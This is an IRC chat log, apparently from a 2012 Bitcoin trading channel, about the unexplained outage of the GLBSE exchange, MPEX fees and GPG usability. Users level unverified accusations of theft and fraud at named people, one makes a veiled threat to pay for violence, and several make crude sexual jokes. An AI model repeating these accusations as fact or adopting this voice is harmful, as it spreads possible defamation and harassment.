Oct 05 15:45:20 <___Atlas___> mircea_popescu: What section is that? Oct 05 15:45:21 <___Atlas___> lol Oct 05 15:46:37 <___Atlas___> Fixed Oct 05 15:46:38 <___Atlas___> lol Oct 05 15:49:52 with the wording Oct 05 15:50:01 and the fact that he could predict an "update" saturday Oct 05 15:50:05 means its not a code thing Oct 05 15:50:25 if it was a code thing, he would to fix it, and put the site back up when it was ready Oct 05 15:52:13 ___Atlas___ you gotta put mpex in there. Oct 05 15:52:29 wtf is "wuala" Oct 05 15:52:32 <___Atlas___> Stock exchange section lol? Oct 05 15:52:38 <___Atlas___> Hm Oct 05 15:53:33 i have no ideea i never wrote for shittypedia. Oct 05 15:53:47 he means saturday like pirate means "saturday" Oct 05 15:53:50 <___Atlas___> It's going to be hard to pull off Oct 05 15:53:59 <___Atlas___> without some goon coming in saying "play stocks" Oct 05 15:54:02 <___Atlas___> or some shit Oct 05 15:54:42 tis all play Oct 05 15:54:43 pigeons: lol Oct 05 15:54:44 and then we dye Oct 05 15:55:24 <___Atlas___> I had to endure many edit wars to get the article to where it is right now Oct 05 15:55:39 <___Atlas___> Some wanted it dedicated to bitcoin.org's shitty client Oct 05 15:55:53 <___Atlas___> but I said no Oct 05 15:55:58 <___Atlas___> I said Bitcoin was a currency Oct 05 15:56:11 <___Atlas___> not a software project managed by a 40 year old virgin Oct 05 15:56:15 <___Atlas___> pseudo libertarian Oct 05 15:56:49 <___Atlas___> who wants to get paid to make small code contributions Oct 05 15:56:57 <___Atlas___> balfgadfhadf Oct 05 15:57:15 lol Oct 05 15:57:35 what's the problem if tux and whoever want ot pay gavin ? Oct 05 15:57:44 their coins, let them have fun Oct 05 15:57:48 you pseudolibertarian you Oct 05 15:58:28 <___Atlas___> Well I am not really libertarian anymore Oct 05 15:58:33 <___Atlas___> I am pretty much amoral at this point Oct 05 15:58:46 <___Atlas___> I don't want bitcoin.org having any influence over Bitcoin Oct 05 15:58:47 actually Oct 05 15:58:52 bitcoin is a commodity, not a currency Oct 05 15:59:04 <___Atlas___> Ukto, we've tried that Oct 05 15:59:05 calling it a currency causes all sorts of problems Oct 05 15:59:13 <___Atlas___> People got really butthurt on wikipedia Oct 05 15:59:24 just saying, it is what it is Oct 05 15:59:24 <___Atlas___> So butthurt Oct 05 15:59:28 a frog, is a frog Oct 05 15:59:28 y ? Oct 05 15:59:31 a bitcoin is a commodity. Oct 05 15:59:56 unless someone can cite a regonized government, recognizing bitcoin as a currency, it is a commodity, nothing more. Oct 05 16:00:09 <___Atlas___> In economics, a commodity is the generic term for any marketable item produced to satisfy wants or needs. Oct 05 16:00:17 <___Atlas___> Currency is a commodity as well Oct 05 16:00:23 <___Atlas___> A commodity can be a currency Oct 05 16:00:30 <___Atlas___> Bitcoin is used as a currency Oct 05 16:00:31 can data storage be a currency? Oct 05 16:00:38 <___Atlas___> so it is a currency Oct 05 16:00:49 <___Atlas___> Ukto: Given enough value, sure. Oct 05 16:01:05 I will trade you cow patties and use it for currency Oct 05 16:01:08 can we add that to the list? Oct 05 16:01:22 pocket lint too Oct 05 16:01:32 i know some stupid ppl that would trade me stuff for pocket lint Oct 05 16:01:39 like a broken pencil Oct 05 16:01:52 i am paying with my currency Oct 05 16:01:53 right? Oct 05 16:03:36 https://bitcointalk.org/index.php?topic=112402.msg1247307#msg1247307 Oct 05 16:03:38 kinda major Oct 05 16:03:44 theymos considering bids under .3 now Oct 05 16:03:54 so what's glbse worth yet ? Oct 05 16:06:25 [MPEX] [F.GIGA.ETF] 400 @ 0.00027772 = 0.1111 BTC [+] Oct 05 16:13:57 [MPEX] [S.DICE] 666 @ 0.00339998 = 2.2644 BTC [+] Oct 05 16:30:13 oh moi **** BEGIN LOGGING AT Fri Oct 5 22:50:49 2012 Oct 05 22:51:40 we need some #btcst style enforcement here, kicks on the word nefario Oct 05 22:52:18 lol Oct 05 22:52:28 lol still ? Oct 05 22:52:49 whatever Oct 05 22:52:54 are ou wearing that black dress mircea_popescu? Oct 05 22:52:56 lmao would be ok? Oct 05 22:53:10 nefarious dude? Oct 05 22:53:56 pigeons which ?! Oct 05 22:54:02 Anyway, the problem is: around December the only one remaining here would be assbot Oct 05 22:54:20 the one you wear when you pretend to be "the girl" Oct 05 22:54:36 no, i can go just fine w/o mentioning james q dummy by hischisen name. Oct 05 22:54:44 hischisen = his chosen Oct 05 22:54:53 he is a Doctor actually Oct 05 22:55:03 Dr. Nefario Oct 05 22:55:28 NO_OOh, are you Nefario? Oct 05 22:55:35 Dr. N(efari)o. call james bond Oct 05 22:56:02 licenced to chill Oct 05 22:56:15 we should have all listened to the great mircea_popescu Oct 05 22:56:18 ha, yes of course I am nefarios Oct 05 22:56:22 now look at us Oct 05 22:56:32 BTCHero eh ?! Oct 05 22:56:42 IMO, glbse made a mistake in trying to court these so-called "legitimate businesses" that wanted to be listed. Oct 05 22:56:42 don't worry, if you didn't listen to him before, or even if you did, you'll get another several chances to hear it Oct 05 22:56:53 We said, but mircea_popescu the site looks so nice and user friendly Oct 05 22:56:53 haha Oct 05 22:57:07 mircea_popescu, the site. coming up next, mircea_popescu, the musical. Oct 05 22:57:18 it will be atonal and it repeats itself alot. Oct 05 22:57:25 lol Oct 05 22:57:38 i'd invest Oct 05 22:57:39 and looks good in IE 6 Oct 05 22:57:46 He/they ought to have told them to look elsewhere, and continued to keep glbse in unregulated territory. Oct 05 22:58:04 B0g4r7_: i hear you but let's face it that isn't the issue here Oct 05 22:58:09 B0g4r7 dude, the guy is just insane. all his "legit" talk was about STARTING A COMPANY Oct 05 22:58:18 you know, like i started polimedia srl 5 yeas ago ? Oct 05 22:58:33 has fuckall to do with registering as a financial services provider. Oct 05 22:58:36 yeah but you still can't afford another domain Oct 05 22:58:48 pigeons stop trying to confuse the issue :D Oct 05 22:58:57 also PORN Oct 05 22:59:05 yeah and you're a gypsy too Oct 05 22:59:12 maybe if someone registered on your site and paid the 20bitcoin you could afford a new domain Oct 05 22:59:18 porn and stocks - what more do you want? Oct 05 22:59:20 What is the issue then? Oct 05 22:59:26 NO_OOh 30 btc. Oct 05 22:59:28 how many registrations to afford a web designer? Oct 05 22:59:41 mircea_popescu: really? when did that change? Oct 05 22:59:45 Can I have a free account mircea_popescu. Oct 05 22:59:47 a big fat gypsy wedding, that ppl are strange, with thir kitsch looks etc Oct 05 22:59:49 about the time glbse went to shit. Oct 05 23:00:02 i'll never get those complaints about webdesign, tld, pr0n... it's obviously a service that works for a lot of ppl Oct 05 23:00:02 Doffx no, but if you wait a while longer you can pay me 50 btc at 20 dolla each Oct 05 23:00:04 trailertrash Oct 05 23:00:04 AHAHAHAHHAHAHAHA Oct 05 23:00:16 Well, now we're left with a gaping vacuum where it once was. Oct 05 23:00:23 Hardly an improvement IMO. Oct 05 23:00:33 Ill give you .50 btc for an account today. Oct 05 23:00:38 B0g4r7 you can just use coinbr eh. Oct 05 23:00:42 Final offer. Oct 05 23:00:57 Doffx i'll give you .3 of that for your wife. if you don't have one get one we can talk. Oct 05 23:01:18 30 btc is way too much Oct 05 23:01:31 1-5 btc would be enough Oct 05 23:01:40 anyway there's some of those usagi scamassets on mpext Oct 05 23:01:46 PsychoticBoy according to whom ? Oct 05 23:02:00 guess the reason for having a high fee is to keep amateur traders out. i actually appreciate that Oct 05 23:02:04 crappy interface, crappy trade system, Oct 05 23:02:05 to me Oct 05 23:02:06 drekk ++ Oct 05 23:02:16 and did i meantion porn? Oct 05 23:02:19 PsychoticBoy you don't know how it feels like to have trades executed within the second Oct 05 23:02:24 it grows on ya. Oct 05 23:02:37 Most everything was listed with glbse. Oct 05 23:02:47 Now all that stuff is inaccessible. Oct 05 23:02:51 I really dont like the gpg trade system Oct 05 23:03:08 Specifically I wanted to buy into ASICMINER, and now I can't (easily). Oct 05 23:03:08 PsychoticBoy because ? Oct 05 23:03:14 Ok, ok, ill give you .45 for an acount today. Oct 05 23:03:25 I hate gpg, I only use it in some emails, because its not user friendly Oct 05 23:03:43 so strange how self-centered people are. Oct 05 23:03:57 problem is not that gpg is not psychoticboy friendly. problem is yu're not gpg friendly Oct 05 23:03:59 fix that please. Oct 05 23:04:23 no I will not use gpg centred sites Oct 05 23:04:29 Its pretty easy to use though, whats difficult about it? Oct 05 23:04:29 you and know who else ? Oct 05 23:04:36 poor people in africa. you're all welcome to your own ghetto. Oct 05 23:04:37 Are you using windows? Oct 05 23:04:41 It's hard to make cryptographic technology user-friendly. Oct 05 23:04:43 it just means poverty, marginality and irrelevance. Oct 05 23:04:47 only partially encrypting mails kinda spoils it imho. you're making it easy for a possible attacker to identify which mails are sensitive Oct 05 23:04:51 yes I use windows Oct 05 23:04:53 PsychoticBoy: coinbr Oct 05 23:05:07 Ahh, yeah windows makes things more difficult Oct 05 23:05:12 In order for it to be effective, the user needs to have more that just a basic understanding of how it works. Oct 05 23:05:14 Some people loves to be hacked Oct 05 23:05:14 thats why ;) Oct 05 23:05:16 i think there's a hm, lemme look for it. Oct 05 23:05:22 Just leave them with that Oct 05 23:05:24 http://www.gpg4win.org/ Oct 05 23:05:29 Or they'll do dumb things and their security will be compromised. Oct 05 23:05:30 What I found hard about gpg is the documentation is lacking on some of the things you need to do. Oct 05 23:05:31 there, it works just fine on windoze too Oct 05 23:05:47 gpg4win is pretty user-friendly. ugly, but not complicated Oct 05 23:05:54 I already use kleopatra fot otc etc Oct 05 23:05:56 you only need to --encrypt --ascii --sign Oct 05 23:05:57 "user friendly" == "user does not need to understand how it works" Oct 05 23:05:57 you just go into cmd line, what's the big deal Oct 05 23:05:59 for* Oct 05 23:06:02 B0g4r7 o that. Oct 05 23:06:08 B0g4r7, pretty much. Oct 05 23:06:20 I understand how it works, I can code etc Oct 05 23:06:20 PsychoticBoy well if you have kleo then i really fail to see your problem. you instal python and run pympex Oct 05 23:06:26 Anyway, it's useless if you got a trojan with a keylogger Oct 05 23:06:37 B0g4r7, you should be familiar with be basic concept of publöic/private key encryption Oct 05 23:06:41 drekk not really Oct 05 23:06:45 you need trojan + rootkit Oct 05 23:06:55 but im lazy, I like one click interfaces Oct 05 23:06:58 Yes, i am drekk. But most novice users are not familiar one bit. Oct 05 23:07:23 it is one click for mpex "submit" Oct 05 23:07:29 When it comes to cryptography though, a thorough understanding is required. Otherwise all a user can do is trust blindly. Oct 05 23:07:59 Blind trust may be OK for running MS Word, but not for security-sensitive things involving lots of money. Oct 05 23:08:02 I will try mpex when its not that expensive, 400$ is a aweful lot Oct 05 23:08:17 PsychoticBoy that will require use of a time machine Oct 05 23:08:22 you should have tried it in may, it was free. Oct 05 23:08:26 why didn't you ? Oct 05 23:08:28 [MPEX] [S.MPOE] 21900 @ 0.00037126 = 8.1306 BTC [+] Oct 05 23:08:29 [MPEX] [S.MPOE] 18900 @ 0.00037188 = 7.0285 BTC [+] Oct 05 23:08:34 mircea_popescu, trojan/rootkit to do what? Oct 05 23:08:40 I won't use a fund who's administrator uses windows and refuses to use gpg, nothing personal... Oct 05 23:08:48 I was stuck in glbse 1.0 Oct 05 23:08:50 drekk trojan for passphrase, rootkit for actual keyring with secret key Oct 05 23:08:54 otherwise passphrase is useless. Oct 05 23:09:10 rdponticelli well he does some gpg, he idents in otc for instance Oct 05 23:09:36 Not enough Oct 05 23:09:54 mircea_popescu, dunno what you mean. :D i was just talking about the possibility for a mitm to tell which of your mails are the important ones, if you only encrypt those Oct 05 23:10:00 Not remotely enough if you're managing other people's money Oct 05 23:10:07 decrypting it is a different thing of course Oct 05 23:10:27 Your choice, I will provide gpg encrypted text if you want to Oct 05 23:10:47 I can but I dont really like it Oct 05 23:11:08 drekk o o sorry, thought you meant about key compromise Oct 05 23:11:23 PsychoticBoy why the hell not man ?! it's great! Oct 05 23:11:27 very empowering. Oct 05 23:11:44 only use it on tor though Oct 05 23:11:45 It's not just that. It's about maintaining a safe environment Oct 05 23:12:05 If you prefer easy of use, you're trading off security Oct 05 23:13:12 rdponticelli seriously now, mpex is shockingly easy to use. people thinking differently are just basing themselves on prejudice Oct 05 23:13:20 if you get them to actually try it they go uhhhh ok ?! Oct 05 23:13:22 that's all !? Oct 05 23:14:21 Yeah, when you learn a couple of thing, everything is easy Oct 05 23:14:49 i mean, i spent about an hour or so getting evoorhees set up with it. he hasn't needed help since. Oct 05 23:15:03 I am able to use it damn it ;) Oct 05 23:15:11 same thing with some other guy, it's an hour to set up then i never hear from them again Oct 05 23:15:27 Ugg, thats not why people are down on Mpex, its not gpg. Oct 05 23:15:41 which is kinda why i'm willing to help pretty much anyone through it. i know once they have it it's good forever. Oct 05 23:15:49 But it's frigthning that there's so many people unwilling to learn anything Oct 05 23:16:06 lazy ppl Oct 05 23:16:26 laze :D Oct 05 23:16:30 kakobrekla i think it's a control issue Oct 05 23:16:32 Zzzzzzz Oct 05 23:17:04 Sweet dreams Oct 05 23:17:29 Keep dreaming with fancy windows Oct 05 23:19:12 The thing is: making things right needs some effort Oct 05 23:19:57 that is true. Oct 05 23:20:02 Meanwhile, we keep relying on tools half baked, "proudly" made in 4 days... Oct 05 23:20:42 Well, all the drama is the consecuence Oct 05 23:20:57 that is also true Oct 05 23:21:02 i'ma get my amen card. Oct 05 23:23:19 Can I get a Halelujah Oct 05 23:32:15 LOL, this theymos character is more full of shit than I wanted to believe. https://bitcointalk.org/index.php?topic=112402.msg1248112#msg1248112 Oct 05 23:32:19 LOL Oct 05 23:32:39 femtotube: erm, theymos is the bitcointalk owner and a glbse shareholder Oct 05 23:32:51 is everyone involved with BTC a fkn thieve and a liar ? Oct 05 23:32:57 basically. Oct 05 23:33:05 I didnt used to believe it, but I do now Oct 05 23:33:23 [MPEX] [S.DICE] 805 @ 0.00325001 = 2.6163 BTC [-] Oct 05 23:33:23 Diablo-D3: and how is that "owner" status any excuse? Oct 05 23:33:24 [MPEX] [S.DICE] 1000 @ 0.00320002 = 3.2 BTC [-] Oct 05 23:33:25 [MPEX] [S.DICE] 1000 @ 0.00320001 = 3.2 BTC [-] Oct 05 23:33:27 [MPEX] [S.DICE] 3195 @ 0.0032 = 10.224 BTC [-] Oct 05 23:33:34 femtotube: it means hes a trusted community member Oct 05 23:33:37 femtotube Diablo-D3 im neither. how about that. Oct 05 23:33:48 mircea_popescu: not from lack of trying. Oct 05 23:33:50 fuck this whole gang of assholes. Oct 05 23:33:56 femtotube: thats my opinion Oct 05 23:34:02 I closed DMC over this shit Oct 05 23:34:08 none of them are worth any trust or respect Oct 05 23:34:13 Diablo-D3 what does that mean ?! Oct 05 23:34:36 shit goes wrong due to outside forces, I get blamed for it by the people who could have helped prevent it Oct 05 23:34:40 so fuck everybody Oct 05 23:34:43 I know all about your DMC saga, Mr Forum Moderator ;) Oct 05 23:35:37 I guess if you sleep with dogs, you will wake up with fleas Oct 05 23:36:01 yeah, pretty much Oct 05 23:36:55 I miss my coin those GLBSE assholes stole from me :( Oct 05 23:37:17 ou'll get 49% back i'm sure Oct 05 23:38:08 me too. I had cold hard BTC in glbse, not securities. Oct 05 23:38:09 I guess all the bond issuers are ecstatic right now. No exchange, no obligations Oct 05 23:38:54 I transferred my coin out of this shithole when fucktard nefario was missing for 3 days Oct 05 23:39:09 SMRTer than me. Oct 05 23:41:21 if BTC really had a community, those fuckers be all bleeding and shitting by blood now. Starting with this asshole from Texas. Trendon Shavers or what ever. Oct 05 23:42:22 but now, it's just a bunch of weak and soft nerds, who start blabbering about human rights the moment some scumbags deserves to go tits up. Oct 05 23:42:25 B0g4r7_ it might be cold but it aint hard :) Oct 05 23:43:06 ou'll get 49% back i'm sure <<< that.. Oct 05 23:43:42 mircea_popescu: when are you going to run? Oct 05 23:43:55 A halving of assets, to go along with the halved block reward. Oct 05 23:44:05 femtotube funny thing, i have an investor been asking me this since about novemver Oct 05 23:44:18 Good thing is, it's really easy to buy your scalp in Romania :) Oct 05 23:44:50 cost almost nothing to get you all be boxed up and everything. Oct 05 23:45:30 haha like a vampire Oct 05 23:45:47 :) Oct 05 23:47:12 5k$ +' Oct 05 23:47:48 femtotube so your idea of security is, spending more money on the guy that ran off with your money ? Oct 05 23:49:07 mircea_popescu: When you run, your shareholder would take part of the bootie :p Oct 05 23:49:09 ? Oct 05 23:49:20 rdponticelli haha yes, i guess so Oct 05 23:49:32 why do i have to run tho ? i'm lazy. can't i just sit here forever and take everyone's money ? Oct 05 23:49:41 I mean, can we run with you? Oct 05 23:49:55 yeah lets all run Oct 05 23:49:55 I have to work out a little Oct 05 23:50:01 to an island in the sun Oct 05 23:50:03 dun dun dun Oct 05 23:50:50 But that's already taken by pirate Oct 05 23:51:14 well we get femtotube to bring some boxers or w/e Oct 05 23:58:38 [MPEX] [F.GIGA.ETF] 2800 @ 0.00027772 = 0.7776 BTC [-] Oct 05 23:58:39 [MPEX] [F.GIGA.ETF] 13318 @ 0.00027772 = 3.6987 BTC [-] Oct 05 23:58:41 [MPEX] [S.MPOE] 34458 @ 0.00037065 = 12.7719 BTC [-] Oct 05 23:58:42 [MPEX] [S.MPOE] 31142 @ 0.00037034 = 11.5331 BTC [-] Oct 06 00:01:27 mircea_popescu: figured this would definitely be one for you, watch boobs for charity? http://www.reddit.com/r/AskReddit/comments/10zv75/okay_so_pornhub_is_donating_money_to_support/ XD Oct 06 00:01:37 lol Oct 06 00:02:18 Worst descriptive url truncation ever. Oct 06 00:02:40 haha Oct 06 00:05:33 so anyone knows the cryptostocks/vircures ppl ? Oct 06 00:08:00 mircea_popescu, nope. sent a PM in the forum to Kumala once regarding VCE. never got an answer Oct 06 00:08:23 drekk sux Oct 06 00:09:12 yea. i like both services pretty much, but again the old prob: lack of communication (skills) Oct 06 00:09:29 seems glbse downtime gave them a boost tho :) Oct 06 00:14:25 soooo... it turns out glbse only had one db ? Oct 06 00:14:29 i am so fascinated. Oct 06 00:14:32 glbse? is that the Stock Market who ran with all those ... I think its called bitcoins Oct 06 00:14:54 those were the days... Oct 06 00:15:17 old history ? Oct 06 00:17:27 "Secret ways to turn her on" ... who wouldnt click that email :) Oct 06 00:18:33 http://polimedia.us/dtng/c/src/134940964040.jpg everybody should jus' relax. Oct 06 00:19:01 too many dicks and not enough pussys in that picture... Oct 06 00:19:32 sorta like bitcoin. Oct 06 00:22:27 mircea_popescu: man, why do you even have that imgboard Oct 06 00:22:31 theres not even anything shocking on it Oct 06 00:22:45 Diablo-D3 i made a buncha shit romanians didn't have cause they were retarded Oct 06 00:22:50 like a digg and a chan and etc. Oct 06 00:23:05 [17:14] glbse? is that the Stock Market who ran with all those ... I think its called bitcoins Oct 06 00:23:29 So the exchange has been offline for one day and already it's 100% sure the bitcoins are gone? Oct 06 00:23:40 [MPEX] [S.MPOE] 27558 @ 0.00037034 = 10.2058 BTC [-] Oct 06 00:23:42 [MPEX] [S.MPOE] 9242 @ 0.00037012 = 3.4206 BTC [-] Oct 06 00:24:13 BTC-Mining clearly :) Oct 06 00:24:45 BTC-Mining: pretty much Oct 06 00:24:50 Well unfortunately, even if there was a theft, there's only a fractions of the funds available on GLBSE. Oct 06 00:25:01 you mean fortunately. Oct 06 00:25:30 It depends. Unfortunately for the would be theft. Oct 06 00:25:35 a ok. Oct 06 00:25:36 theif* Oct 06 00:25:41 thief* Oct 06 00:25:44 dammit Oct 06 00:25:54 the large problem here is this : with the exception of *maybe* two items the btcv value of glbse paper is now 0. Oct 06 00:25:59 so in that sense... Oct 06 00:26:07 Most funds were used outside GLBSE Oct 06 00:26:18 BTC-Mining and nobody's putting it back in to buy glbse insecurities. Oct 06 00:26:24 so that half of the equation is gone. Oct 06 00:29:29 So GLBSE's website is down for less than 24 hour and already it's the worst theft/scam/apocalypse in Bitcoin history, everything is worth 0, everything spontaneously combusts to never return? Oct 06 00:30:08 pretty awesome, right :) Oct 06 00:31:28 BTC-Mining well tbh it had it coming for weeks now. Oct 06 00:31:36 BTC-Mining, that was yesterday...today, pitchforks Oct 06 00:31:44 it's not one isolated event, it's the final explosion of a series of explosions Oct 06 00:32:17 I win at trolling on the road Oct 06 00:32:42 some poor bastard just got my ticket Oct 06 00:33:04 ... are everyone self-proclaimed prophets now that they all hold absolute truth and knows what will happen? Oct 06 00:33:23 We don't have the slightest idea why GLBSE is down currently. Oct 06 00:33:36 http://www.amazon.com/Extraordinary-Popular-Delusions-Madness-Crowds/dp/1604594411 Oct 06 00:33:45 we do have... someone stole the coins Oct 06 00:34:11 there is no other possible explanation Oct 06 00:34:29 ... Oct 06 00:34:30 So! Will it ever come back up? Oct 06 00:34:36 ;;seen nefario Oct 06 00:34:36 nefario was last seen in #bitcoin-assets 1 week, 4 days, 1 hour, 34 minutes, and 41 seconds ago: Those assets are not listed or traded anymore Oct 06 00:34:44 oh, they really are panicked huh Oct 06 00:34:57 who are "they" ? :D Oct 06 00:35:01 Ok, I guess when one of my favorite non-bitcoin website is down, it's because all the USD is gone. Oct 06 00:35:19 nah... it has to be about bitcoins Oct 06 00:35:21 "Learn why intelligent people do amazingly stupid things when caught up in speculative edevorse." Oct 06 00:35:51 ;;ticker Oct 06 00:35:51 Best bid: 12.821, Best ask: 12.89937, Bid-ask spread: 0.07837, Last trade: 12.89939, 24 hour volume: 30528, 24 hour low: 12.51, 24 hour high: 12.97 Oct 06 00:35:54 Yes, speculation... but according to each bitcoin prophet (50% of bitcointalk's population), their speculation is always fact. Oct 06 00:36:03 [MPEX] [O.BTCUSD.P150T] 800 @ 0.33112668 = 264.9013 BTC [+] Oct 06 00:36:22 o_O Oct 06 00:36:35 originally published 1841 Oct 06 00:36:47 some things never change Oct 06 00:36:57 so you know from some secret source that GLBSE BTC are really gone? as you say its a fact now Oct 06 00:37:14 nefario announced in the secret channel Oct 06 00:37:14 i dunno. i see the bias towards "it's the end" very reasonable given that there was no notice whatosever. Oct 06 00:37:21 and no communication worth two craps. Oct 06 00:37:27 I have no idea if any coins were stolen, if GLBSE is coming back up or if it's just really bad judgement from Nefario who just omitted giving any information. Oct 06 00:37:30 dub i heared the same Oct 06 00:37:32 he took the money, using it for a sex change Oct 06 00:37:48 I'll at least wait to see the situation concretize itself before claiming anything as a fact. Oct 06 00:38:04 BTC-Mining if one day you go to this corner shop in your neighbourhood and it's ust closed. no notice no anything Oct 06 00:38:12 but you said yourself that its a fact now that GLBSE BTCs are gone Oct 06 00:38:15 he is leaving his wife and marrying genjix Oct 06 00:38:16 what's your thought process ? Oct 06 00:38:44 I'll assume the shop owner might be sick, or suddenly died, as there's no notice he's closing shop. Oct 06 00:38:58 so nefario is DEAD WTF Oct 06 00:39:12 BTC-Mining ^^ Oct 06 00:39:14 someone may say that to the others who only read the board Oct 06 00:39:18 And wait to see if a relative picks it up, if the owner comes back, or if anything else happen. Oct 06 00:39:49 I mean, a place being closed unexpectedly is cause for wonder about what might have happened. Oct 06 00:40:03 But I won't freak out instantly. Oct 06 00:40:06 countdown to someone posting in forum that nefario is dead (100% fact) in 5, 4, 3... Oct 06 00:40:21 we dont have do wonder anymore ... you said yourself Nefario is dead and the coins have been stolen... Oct 06 00:40:28 witnessed. Oct 06 00:40:34 also, hashking was 15 yo. Oct 06 00:40:35 D Oct 06 00:40:37 :D Oct 06 00:41:20 Yeah, it's just one of many speculative idea brought forth, not a fact. That's the problem with the forum. Speculations/hearsay are distorted/presented as facts. Oct 06 00:41:41 but you said you had a secret source Oct 06 00:41:45 so it must be fact Oct 06 00:41:57 did you say soemthing you were not allowed to say? Oct 06 00:42:05 I never said I had a secret source eh Oct 06 00:42:08 is BTC-Mining really nefario ? Oct 06 00:42:12 WHO IS DEAD ?! Oct 06 00:42:14 have you been threatend by the thief maybe? Oct 06 00:42:49 this is getting better and better Oct 06 00:42:55 what a crime we have to solve here on IRC Oct 06 00:43:16 I like the panic in theymos thread Oct 06 00:43:16 the btc-uttler did it. Oct 06 00:43:23 THERE ARE BACKUPS RIGHT???11 Oct 06 00:43:33 No, no, actually, the fact is, everyone in Bitcoins are actual insane and placed in an institution. Bitcoins are all but a figment of their imagination that started with one of the patient shouting the word "Bitcoin". It's true. Oct 06 00:43:33 dub from what i hear yes there are. Oct 06 00:43:39 I doubt there are Oct 06 00:43:50 nefario is intersango and they dont know about backups Oct 06 00:43:51 who knows at this point. Oct 06 00:44:15 nefario is intersango .... and nefario is dead ... and the btc are ... we are screwed Oct 06 00:44:24 its cool, sounds like rapeghost has raped a backup of his own Oct 06 00:44:28 The plot thickens... Oct 06 00:44:36 Let's write a novel then! Oct 06 00:44:57 ok ... starting with the words "According to BTC-Minings secret source ... " Oct 06 00:44:59 50 shades of nefario Oct 06 00:45:35 You can still see it like that, since there is a lack of information... but what I see is exactly what I had predicted: GLBSE was a highly illegal business and Nefario was just a crook working in conspiracy with other crooks... and one of them was theymos - the admin of this forum, who owned 23% of GLBSE - had anyone of you known about it? Oct 06 00:45:40 dun dun dun Oct 06 00:45:57 mircea_popescu++ Oct 06 00:46:09 Theymos owns ~7% of the shares. Oct 06 00:46:14 the whole community has been taken by a cabal of limey grifters Oct 06 00:46:22 theymos has been milking btc from Btalk Oct 06 00:46:23 for ages Oct 06 00:46:25 BTC-Mining nah like a quarter. Oct 06 00:46:28 dont you remember when i made that stink Oct 06 00:46:31 about him claiming to be non profit Oct 06 00:46:33 The remaining of the shares he sell are from other holders also exiting. Oct 06 00:46:38 yte he couldnt prove any of the money actually went to the forum Oct 06 00:46:50 rg: clearly it doesnt Oct 06 00:46:50 Probably because they don't want to take part in a regulated GLBSE Oct 06 00:46:52 forum with 0 costs, accepting donations Oct 06 00:46:54 http://vimeo.com/36645417 Oct 06 00:46:59 for 'operating costs' Oct 06 00:47:00 like wtf Oct 06 00:47:01 theymos personally owns about ~7% of the shares. Oct 06 00:47:06 operating what? Oct 06 00:47:13 it cant handle 500 users Oct 06 00:47:17 its very wel known mtcox pays for bitcointalk's hosting Oct 06 00:47:22 [MPEX] [O.BTCUSD.C110T] 571 @ 0.26373924 = 150.5951 BTC [-] Oct 06 00:47:23 so they dont pay that Oct 06 00:47:24 if you were paynig for that you are retarded Oct 06 00:47:26 all the admins are volunteers Oct 06 00:47:47 he's easily taken in 10k btc from the forum Oct 06 00:47:58 for this forum software that's 'coming out in the future' Oct 06 00:48:26 rg if i owned the forum i'd expect money too. Oct 06 00:48:29 Well technically, the whole amount is still growing with donations and offered as a bounty. Oct 06 00:48:29 what's the big deal ? Oct 06 00:48:34 mircea Oct 06 00:48:38 the big deal is Oct 06 00:48:43 (as if its not obvious enough) Oct 06 00:48:48 you cant say you're a non prfit Oct 06 00:48:52 when you're not a fucking non Oct 06 00:48:52 profit Oct 06 00:48:57 also, they sell advertising Oct 06 00:49:00 yes Oct 06 00:49:03 EXPENSIVE advertising Oct 06 00:49:07 and don't have ANY costs Oct 06 00:49:14 we used to advertise on btalk Oct 06 00:49:18 after paying him for like 2 weeks Oct 06 00:49:23 i was like .. no amount o clients is worht this Oct 06 00:49:25 DOIN IT FOR THE COMMUNITY BRAH Oct 06 00:49:26 might as well pay google Oct 06 00:49:34 yeah the community has seen 0.00 btc from theymos Oct 06 00:49:55 hello drama queens Oct 06 00:49:57 do we have an estimate of how much btc is tied up in glbse? Oct 06 00:50:16 rg is he registered as a nonprofit ? Oct 06 00:50:18 i have 1.5 k in glbse Oct 06 00:50:23 mircea_popescu: no Oct 06 00:50:26 he just lies and claims they are Oct 06 00:50:27 then ? Oct 06 00:50:28 which is even worse Oct 06 00:50:42 on his donation begging page he says hes a non profit Oct 06 00:50:49 dub: I think the other holders of GLBSE know more about that. Oct 06 00:50:54 dub yes. someting like a coupla k's. Oct 06 00:50:55 Good night aal Oct 06 00:51:01 I am off to bed Oct 06 00:51:03 mircea_popescu: like a year ago Oct 06 00:51:06 when i made this stink Oct 06 00:51:09 he had around $20k Oct 06 00:51:15 which is worth 50% more now Oct 06 00:51:15 so ? Oct 06 00:51:26 dude, if i ran the forum i'd expect to be paid. it's only natural. Oct 06 00:51:32 and im fine with that Oct 06 00:51:36 but dont claim to be a fucking non profit Oct 06 00:51:38 and exploit people Oct 06 00:51:45 i guess he's pussyfooting around it doesn't help Oct 06 00:51:47 it is AGAINST THE LAW Oct 06 00:51:50 to say you're a non profit Oct 06 00:51:55 yeah. Oct 06 00:51:57 people go to prison Oct 06 00:51:59 its FRAUD Oct 06 00:52:03 at this point, I would be shitting brixx if I had issued an asset Oct 06 00:52:07 people should go to prison for CAPS Oct 06 00:52:11 i wouldnt Oct 06 00:52:12 why whst's new Oct 06 00:52:16 nefario is going to sort everyhting out Oct 06 00:52:16 you gone get gitmod Oct 06 00:52:25 if he actually was in trouble for glbse Oct 06 00:52:31 all he' dhave to do is transfer it to someone else Oct 06 00:52:35 black-bagged off to egypt? Oct 06 00:52:35 and distance himself Oct 06 00:52:42 yeah because that would magically get him out of jail Oct 06 00:52:43 and he can say Oct 06 00:52:46 'i dint do shit' Oct 06 00:52:46 well Oct 06 00:52:49 hes obviously not in jail Oct 06 00:52:51 [17:52] at this point, I would be shitting brixx if I had issued an asset Oct 06 00:52:53 so.. Oct 06 00:52:54 obviously Oct 06 00:52:55 Why? Oct 06 00:53:02 im with BTC-Mining Oct 06 00:53:06 i have full confidence in nefario Oct 06 00:53:21 i'm glad you do rg Oct 06 00:53:29 Issuers have the money OUTSIDE glbse. They don't keep it on GLBSE, they need to use it. Oct 06 00:53:33 i no longer have full confidence in anyone Oct 06 00:53:33 like you had in asshole pirate? Oct 06 00:53:43 what about me jcpham Oct 06 00:53:47 BTC-Mining: working out great for goat Oct 06 00:53:53 full confidence? Oct 06 00:53:59 do we want to go there Oct 06 00:54:00 oh i dont need full confidence Oct 06 00:54:05 just a little bit Oct 06 00:54:10 you have lots Oct 06 00:54:12 like you wouldnt be afraid to leave me alone with your lil sister Oct 06 00:54:19 admit it, he's dead and you've already raped his ghost Oct 06 00:54:23 i don't have sister Oct 06 00:54:32 i wouldn't leave you alone with any kids 